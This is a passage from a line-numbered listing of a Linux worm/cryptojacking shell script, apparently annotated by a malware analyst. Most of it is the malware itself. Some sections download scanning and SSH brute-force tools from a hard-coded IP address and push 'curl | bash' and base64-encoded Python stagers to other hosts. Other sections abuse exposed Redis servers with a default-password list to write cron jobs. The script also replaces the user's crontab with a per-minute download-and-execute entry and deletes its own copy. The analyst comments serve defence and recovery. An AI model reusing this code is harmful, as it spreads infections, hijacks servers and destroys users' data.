  364. #if [ ! "$(ps -fe | grep '/usr/sbin/sshd  /tmp/ipss'| grep -v grep)" ]; then
  365. #       if [[ $EUID = 0 ]];
  366. #       then
  367. #           echo "xd" > /tmp/.checking
  368. #           $WGET "$DIR"/masscan http://205.185.116.78/masscan
  369. #           $WGET "$DIR"/p http://205.185.116.78/p
  370. #           $WGET "$DIR"/hxx http://205.185.116.78/hxx
  371. #           lwp-download http://205.185.116.78/masscan "$DIR"/masscan
  372. #           lwp-download http://205.185.116.78/p "$DIR"/p
  373. #           lwp-download http://205.185.116.78/hxx "$DIR"/hxx
  374. #           chmod 777 "$DIR"/hxx
  375. #           chmod 777 "$DIR"/masscan
  376. #           rm -rf /tmp/sshcheck /tmp/ssh_vuln.txt /tmp/scan.log /tmp/ipss
  377. #           nohup /tmp/masscan 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 --max-rate 600000 -p22 --wait 0 | awk '{print $6}' > /tmp/ipss
  378. #           #nohup /tmp/scan $rand.$rand2.0.0-$rand.$rand2.255.255 22 > /tmp/ssh_vuln.txt
  379. #           #cat /tmp/ssh_vuln.txt | grep 'OpenSSH' | awk '{print $1}' | uniq | shuf > /tmp/sshcheck
  380. #           nohup /tmp/hxx $threads -f /tmp/ipss /tmp/p 22 'curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms' >/dev/null 2>&1
  381. #           echo Finished
  382. #           pkill -9 hxx
  383. #           rm -rf /tmp/.checking
  384. #       else
  385. #           echo "xd" > /tmp/.checking
  386. #           $WGET "$DIR"/scan http://205.185.116.78/scan
  387. #           $WGET "$DIR"/p http://205.185.116.78/p
  388. #           $WGET "$DIR"/hxx http://205.185.116.78/hxx
  389. #           lwp-download http://205.185.116.78/scan "$DIR"/scan
  390. #           lwp-download http://205.185.116.78/p "$DIR"/p
  391. #           lwp-download http://205.185.116.78/hxx "$DIR"/hxx
  392. #           chmod 777 "$DIR"/hxx
  393. #           chmod 777 "$DIR"/scan
  394. #           rm -rf /tmp/sshcheck /tmp/ssh_vuln.txt /tmp/scan.log /tmp/ipss
  395. #           nohup /tmp/scan $range.0.0-$range.255.255 22 > /tmp/ssh_vuln.txt
  396. #           cat /tmp/ssh_vuln.txt | grep "OpenSSH" | awk '{print $1}' | uniq | shuf > /tmp/ipss
  397. #           nohup /tmp/hxx $threads -f /tmp/ipss /tmp/p 22 'curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms' >/dev/null 2>&1
  398. #           echo Finished
  399. #           pkill -9 hxx
  400. #           rm -rf /tmp/.checking
  401. #   fi
  402. #
  403. #else
  404. #   echo "Loading"
  405. #fi
  406.  
  407. #if [ -f "/tmp/.checking" ];
  408. #then
  409. #   echo "loading"
  410. #else
  411. #   echo "xd" > /tmp/.checking
  412. #   $WGET "$DIR"/linux.tar.gz http://$url/linux.tar.gz
  413. #   $WGET "$DIR"/sshexec http://$url/sshexec
  414. #   $WGET "$DIR"/sshpass http://$url/sshpass
  415. #   lwp-download http://$url/linux.tar.gz "$DIR"/linux.tar.gz
  416. #   lwp-download http://$url/sshexec "$DIR"/sshexec
  417. #   lwp-download http://$url/sshpass "$DIR"/sshpass
  418. #   chmod 777 "$DIR"/sshexec
  419. #   chmod 777 "$DIR"/sshpass
  420. #   sed -i 's/:/ /g' /tmp/sparte.txt
  421. #   nohup echo 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 | base64 -d | bash - >/dev/null 2>&1
  422. #   rm -rf /tmp/.checking
  423. #fi
  424.  
  425. #if [ -f "/tmp/.redis" ]; then
  426. #   if ! command -v "redis-cli" &> /dev/null
  427. #   then
  428. #       echo "COMMAND could not be found"
  429. #       apt install redis-tools -y >/dev/null
  430. #       yum install redis-tools -y >/dev/null
  431. #
  432. #   else
  433. #       if [[ $EUID = 0 ]]; then
  434. #           echo "xd" > /tmp/.redis
  435. #           apt install redis-tools -y >/dev/null
  436. #           yum install redis-tools -y >/dev/null
  437. #           echo 'config set dbfilename "backup.db"' > /tmp/.dat
  438. #           echo 'save' >> /tmp/.dat
  439. #           echo 'flushall' >> /tmp/.dat
  440. #           echo 'set backup1 "\n\n\n*/2 * * * * wget -q -O - http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  441. #           echo 'set backup2 "\n\n\n*/3 * * * * curl -fsSL http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  442. #           echo 'set backup3 "\n\n\n*/4 * * * * lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n\n"' >> /tmp/.dat
  443. #           echo 'set backup4 "\n\n\n*/5 * * * * echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -\n\n"' >> /tmp/.dat
  444. #           echo 'config set dir "/var/spool/cron/"' >> /tmp/.dat
  445. #           echo 'config set dbfilename "root"' >> /tmp/.dat
  446. #           echo 'save' >> /tmp/.dat
  447. #           echo 'config set dir "/var/spool/cron/crontabs"' >> /tmp/.dat
  448. #           echo 'save' >> /tmp/.dat
  449. #           sleep 1
  450. #           rm -rf /tmp/redis_vuln.txt
  451. #           nohup /tmp/masscan 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 --max-rate 600000 -p6379 --wait 0 | awk '{print $6}' > /tmp/redis_vuln.txt
  452. #           cat /tmp/redis_vuln.txt | while read line; do
  453. #           cat /tmp/.dat | timeout 3 redis-cli -h $line &>/dev/null &
  454. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a redis &>/dev/null &
  455. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a root &>/dev/null &
  456. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a oracle &>/dev/null &
  457. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a password &>/dev/null &
  458. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a p@ssw0rd &>/dev/null &
  459. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty &>/dev/null &
  460. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty123 &>/dev/null &
  461. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123 &>/dev/null &
  462. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123! &>/dev/null &
  463. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a 123456 &>/dev/null &
  464. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a admin &>/dev/null &
  465. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a mysql &>/dev/null &
  466. #           done < /tmp/redis_vuln.txt
  467. #           rm -rf /tmp/.redis
  468. #       else
  469. #           echo "xd" > /tmp/.redis
  470. #           echo 'config set dbfilename "backup.db"' > /tmp/.dat
  471. #           echo 'save' >> /tmp/.dat
  472. #           echo 'flushall' >> /tmp/.dat
  473. #           echo 'set backup1 "\n\n\n*/2 * * * * wget -q -O - http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  474. #           echo 'set backup2 "\n\n\n*/3 * * * * curl -fsSL http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  475. #           echo 'set backup3 "\n\n\n*/4 * * * * lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n\n"' >> /tmp/.dat
  476. #           echo 'set backup4 "\n\n\n*/5 * * * * echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -\n\n"' >> /tmp/.dat
  477. #           echo 'config set dir "/var/spool/cron/"' >> /tmp/.dat
  478. #           echo 'config set dbfilename "root"' >> /tmp/.dat
  479. #           echo 'save' >> /tmp/.dat
  480. #           echo 'config set dir "/var/spool/cron/crontabs"' >> /tmp/.dat
  481. #           echo 'save' >> /tmp/.dat
  482. #           rm -rf /tmp/redislan /tmp/redislan.txt
  483. #           sleep 1
  484. #           nohup /tmp/scan $range.0.0-$range.255.255 6379 > /tmp/redislan.txt
  485. #           cat /tmp/redislan.txt | awk '{print $1}' | uniq | shuf > /tmp/redislan
  486. #           sleep 1
  487. #           cat /tmp/redislan | while read line; do
  488. #           cat /tmp/.dat | timeout 3 redis-cli -h $line &>/dev/null &
  489. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a redis &>/dev/null &
  490. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a root &>/dev/null &
  491. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a oracle &>/dev/null &
  492. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a password &>/dev/null &
  493. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a p@ssw0rd &>/dev/null &
  494. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty &>/dev/null &
  495. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty123 &>/dev/null &
  496. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123 &>/dev/null &
  497. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123! &>/dev/null &
  498. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a 123456 &>/dev/null &
  499. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a admin &>/dev/null &
  500. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a mysql &>/dev/null &
  501. #           done < /tmp/redislan
  502. #           rm -rf /tmp/.redis
  503. #
  504. #       fi
  505. #
  506. #   fi
  507. #fi
  508.  
  # Per-user crontab persistence. If the invoking user's crontab mentions neither $url nor the
  # base64 stager, the whole crontab is deleted and replaced with a single every-minute
  # download entry. Legitimate jobs of that user are lost, so restoring the crontab from backup
  # is part of recovery, not just deleting the malicious line.
  509. if crontab -l | grep -q "$url\|$base"
  510. then
  511.     echo "Cron exists"
  512. else
  513.     crontab -r
  514.     echo "Cron not found"
  515.     echo "* * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms" | crontab -
  516. fi
  517.  
  518.  
  # The script removes its own on-disk copy ($DIR/xms) and a 2start.jpg file before spreading, so
  # the absence of /tmp/xms on a host does not rule out execution; rely on cron files, the
  # payload files in $DIR and the network indicators instead.
  519. rm -rf "$DIR"/2start.jpg
  520. rm -rf "$DIR"/xms
  # SSH propagation runs last, after persistence and payload launch are in place.
  521. localgo